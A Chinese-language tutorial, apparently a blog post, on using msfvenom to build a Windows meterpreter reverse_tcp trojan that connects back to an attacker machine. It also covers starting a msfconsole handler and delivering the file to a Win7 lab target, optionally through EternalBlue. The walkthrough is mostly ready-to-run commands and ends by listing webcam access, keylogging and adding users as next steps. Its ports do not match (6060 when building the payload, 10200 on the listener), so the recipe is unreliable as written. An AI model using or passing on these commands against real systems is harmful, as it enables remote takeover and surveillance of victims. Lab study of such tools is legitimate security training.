MSFvenom恶意程序生成与利用

MSFvenom

1.1 MSFvenom介绍

MSFvenom是Msfpayload和Msfencode的组合，可以生成各种攻击载荷，并且可以对载荷进行编码。做渗透测试时往往需要将有效负载部署在目标系统上，而msfvenom可以快速创建符合靶机的载荷，Msfvenom 包含标准的命令行选项。可以为许多平台生成有效负载，如Android，Windows，Unix，Nodejs，Cisco等等。

英文介绍来源：https://www.offsec.com（网站有风险打开需谨慎）

1.2 MSFvenom 简单使用

示例说明：今天利用MSFvenom 制作一个 .exe 的木马文件，然后通过win7的永恒之蓝漏洞发送到靶机Windows机器的C盘根目录并运行（这里为了加深了解永恒之蓝操作，也可以手动发送至win7）。运行后就可以在Kali系统上面利用msfconsole连接msfvenom服务控制靶机。

1.2.1 MSFvenom手册

#> man msfvenom

1.2.2 环境介绍

攻击机：

项目	参数	备注
机器类型	攻击机
操作系统	kali
IP地址	192.168.2.214

靶机：

项目	参数	备注
机器类型	靶机
操作系统	win7	关闭防火墙卸载相关杀毒软件
IP地址	192.168.2.233

1.2.3 木马文件生成

#>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.214 LPORT=6060 -f exe>1.exe

命令解说：

命令	说明	备注
windows/meterpreter/reverse_tcp	有效载荷类型，可以根据实际情况进行选择
LHOST	攻击机的IP，即靶机点击程序后回链的ip
LPORT	攻击机的端口，即靶机点击程序后回链的端口
-f	输出的格式

1.2.4 设置侦听

启动msfconsole

#> msfconsole

设置监听

msf6>use exploit/multi/handler

msf6>set payload windows/meterpreter/reverse_tcp

msf6>set lhost 192.168.2.214 #攻击机ip

msf6>set lport 10200 #链接端口

msf6>exploit/run #运行

1.2.5 在靶机中运行程序

将文件拷贝到靶机并运行（直接拷贝或通过永恒之蓝漏洞上传，参考《渗透基础+永恒之蓝演练》）。

1.2.6 程序生效，执行相关SHELL

运行1.exe文件

在运行的瞬间，kali就已经监听并链接成功！下一步可以进行启用摄像头、增加用户并分配权限、监听键盘、截屏等操作。

---

普法宣传人人有责。国家法律法规数据库-中华人民共和国网络安全法